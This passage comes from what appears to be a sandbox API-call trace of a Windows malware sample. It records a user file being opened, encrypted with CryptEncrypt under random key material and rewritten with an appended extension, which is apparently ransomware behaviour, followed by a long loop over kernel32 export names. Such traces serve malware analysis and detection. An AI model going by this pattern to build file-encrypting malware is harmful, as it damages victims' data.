HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.uCbMJb" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.ucbmjb"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x284 [0182.235] GetFileSizeEx (in: hFile=0x284, lpFileSize=0x36fd838 | out: lpFileSize=0x36fd838*=288) returned 1 [0182.235] CreateFileMappingW (hFile=0x284, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x288 [0182.235] MapViewOfFile (hFileMappingObject=0x288, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x8a0000 [0182.235] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x20, pbBuffer=0x750000 | out: pbBuffer=0x750000) returned 1 [0182.235] CryptGenRandom (in: hProv=0x49bb80, dwLen=0x8, pbBuffer=0x750020 | out: pbBuffer=0x750020) returned 1 [0182.235] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.236] CryptEncrypt (in: hKey=0x479638, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x28, dwBufLen=0x100 | out: pbData=0x8b0000*, pdwDataLen=0x36fd7a0*=0x100) returned 1 [0182.236] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x8c0000 [0182.236] VirtualFree (lpAddress=0x8c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.237] UnmapViewOfFile (lpBaseAddress=0x8a0000) returned 1 [0182.237] CloseHandle (hObject=0x288) returned 1 [0182.237] SetFilePointerEx (in: hFile=0x284, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0182.237] WriteFile (in: hFile=0x284, lpBuffer=0x8b0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x36fd7c0, lpOverlapped=0x0 | out: lpBuffer=0x8b0000*, lpNumberOfBytesWritten=0x36fd7c0*=0x108, lpOverlapped=0x0) returned 1 [0182.238] CloseHandle (hObject=0x0) returned 0 [0182.238] CloseHandle (hObject=0x284) returned 1 [0182.239] VirtualFree (lpAddress=0x8b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.239] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0182.239] GetTickCount () returned 0x1134f2a [0182.239] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0182.240] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0182.240] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x8a0000 [0182.240] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x8b0000 [0182.240] lstrlenA (lpString="kernel32.dll") returned 12 [0182.240] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0182.240] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0182.240] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0182.240] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0182.240] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0182.240] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0182.240] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0182.240] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0182.240] lstrlenA (lpString="ADDATOMA") returned 8 [0182.240] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0182.241] lstrlenA (lpString="ADDATOMW") returned 8 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0182.241] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0182.241] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0182.241] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0182.241] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0182.241] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0182.241] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0182.241] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0182.241] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0182.241] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0182.241] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0182.241] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0182.241] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0182.241] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0182.241] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0182.241] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0182.241] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0182.241] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0182.241] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0182.242] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0182.242] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0182.242] lstrlenA (lpString="BACKUPREAD") returned 10 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0182.242] lstrlenA (lpString="BACKUPSEEK") returned 10 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0182.242] lstrlenA (lpString="BACKUPWRITE") returned 11 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0182.242] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0182.242] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0182.242] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0182.242] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0182.242] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0182.242] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0182.242] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0182.242] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0182.242] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0182.242] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0182.242] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0182.242] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0182.242] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0182.243] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0182.243] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0182.243] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0182.243] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0182.243] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0182.243] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0182.243] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0182.243] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0182.243] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0182.243] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0182.243] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0182.243] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0182.243] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0182.243] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0182.243] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0182.243] lstrlenA (lpString="BEEP") returned 4 [0182.243] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0182.243] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0182.244] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0182.244] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0182.244] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0182.244] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0182.244] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0182.244] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0182.244] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0182.244] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0182.244] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0182.244] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0182.244] lstrlenA (lpString="CANCELIO") returned 8 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0182.244] lstrlenA (lpString="CANCELIOEX") returned 10 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0182.244] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0182.244] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0182.244] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0182.244] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0182.244] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0182.244] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0182.245] lstrlenA (lpString="CHECKELEVATION") returned 14 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0182.245] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0182.245] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0182.245] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0182.245] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0182.245] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0182.245] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0182.245] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0182.245] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0182.245] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0182.245] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0182.245] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0182.245] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0182.245] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0182.245] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0182.245] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0182.245] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0182.245] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0182.245] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0182.246] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0182.246] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0182.246] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0182.246] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0182.246] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0182.246] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0182.246] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0182.246] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0182.246] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0182.246] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0182.246] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0182.246] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0182.246] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0182.246] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0182.246] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0182.246] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0182.246] lstrcpyA (in: lpString1=0x36fcbb4, 